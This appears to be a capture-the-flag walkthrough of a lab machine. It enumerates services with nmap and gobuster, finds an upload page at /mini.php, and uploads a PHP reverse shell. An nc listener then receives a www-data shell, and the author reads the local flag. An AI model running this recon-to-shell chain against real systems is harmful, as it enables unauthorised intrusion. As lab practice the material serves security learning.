┌──(kali㉿VirtualBox)-[~]
└─$ nmap -sC -s 192.168.72.132
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 9c:52:32:5b:8b:f6:38:c7:7f:a1:b7:04:85:49:54:f3 (RSA)
| 256 d6:13:56:06:15:36:24:ad:65:5e:7a:a1:8c:e5:64:f4 (ECDSA)
|_ 256 1b:a9:f3:5a:d0:51:83:18:3a:23:dd:c4:a9:be:59:f0 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.72.132 -w /usr/share/wordlists/dirb/common.txt -q -t 100
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10918]
/javascript (Status: 301) [Size: 321] [--> <http://192.168.72.132/javascript/>]
/phpmyadmin (Status: 301) [Size: 321] [--> <http://192.168.72.132/phpmyadmin/>]
/robots.txt (Status: 200) [Size: 21]
/server-status (Status: 403) [Size: 279]
On /robots.txt we see this
Doing another fuzzing on /phpmyadmin
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.72.132/phpmyadmin -w /usr/share/wordlists/dirb/common.txt -q -t 100
/.htpasswd (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.hta (Status: 403) [Size: 279]
/doc (Status: 301) [Size: 325] [--> <http://192.168.72.132/phpmyadmin/doc/>]
/favicon.ico (Status: 200) [Size: 22486]
/index.php (Status: 200) [Size: 10531]
/js (Status: 301) [Size: 324] [--> <http://192.168.72.132/phpmyadmin/js/>]
/libraries (Status: 403) [Size: 279]
/locale (Status: 301) [Size: 328] [--> <http://192.168.72.132/phpmyadmin/locale/>]
/phpinfo.php (Status: 200) [Size: 10533]
/setup (Status: 401) [Size: 461]
/sql (Status: 301) [Size: 325] [--> <http://192.168.72.132/phpmyadmin/sql/>]
/templates (Status: 403) [Size: 279]
/themes (Status: 301) [Size: 328] [--> <http://192.168.72.132/phpmyadmin/themes/>]
After a while, tried some failed Exploitation, get back to fuzzing again with extension this time
┌──(kali㉿VirtualBox)-[~]
└─$ gobuster dir -u 192.168.72.132 -w /usr/share/wordlists/dirb/common.txt -q -t 100 -x php
/.hta (Status: 403) [Size: 279]
/.htaccess (Status: 403) [Size: 279]
/.htpasswd (Status: 403) [Size: 279]
/.hta.php (Status: 403) [Size: 279]
/.htaccess.php (Status: 403) [Size: 279]
/.htpasswd.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10918]
/javascript (Status: 301) [Size: 321] [--> <http://192.168.72.132/javascript/>]
/mini.php (Status: 200) [Size: 3828]
/phpmyadmin (Status: 301) [Size: 321] [--> <http://192.168.72.132/phpmyadmin/>]
/robots.txt (Status: 200) [Size: 21]
/server-status (Status: 403) [Size: 279]
Nani?!! /mini.php What is that?!!
There is an upload portal lets……
Then we visit 192.168.72.132/php-reverse-shell.php with netcat listening
┌──(kali㉿VirtualBox)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.49.72] from (UNKNOWN) [192.168.72.132] 58590
Linux funbox7 4.15.0-117-generic #118-Ubuntu SMP Fri Sep 4 20:02:41 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
13:57:14 up 35 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
There is a local.txt at /var/www
$ pwd
/var/www
$ cat local.txt
3ed9b84235d05d87e0746c990614b9f8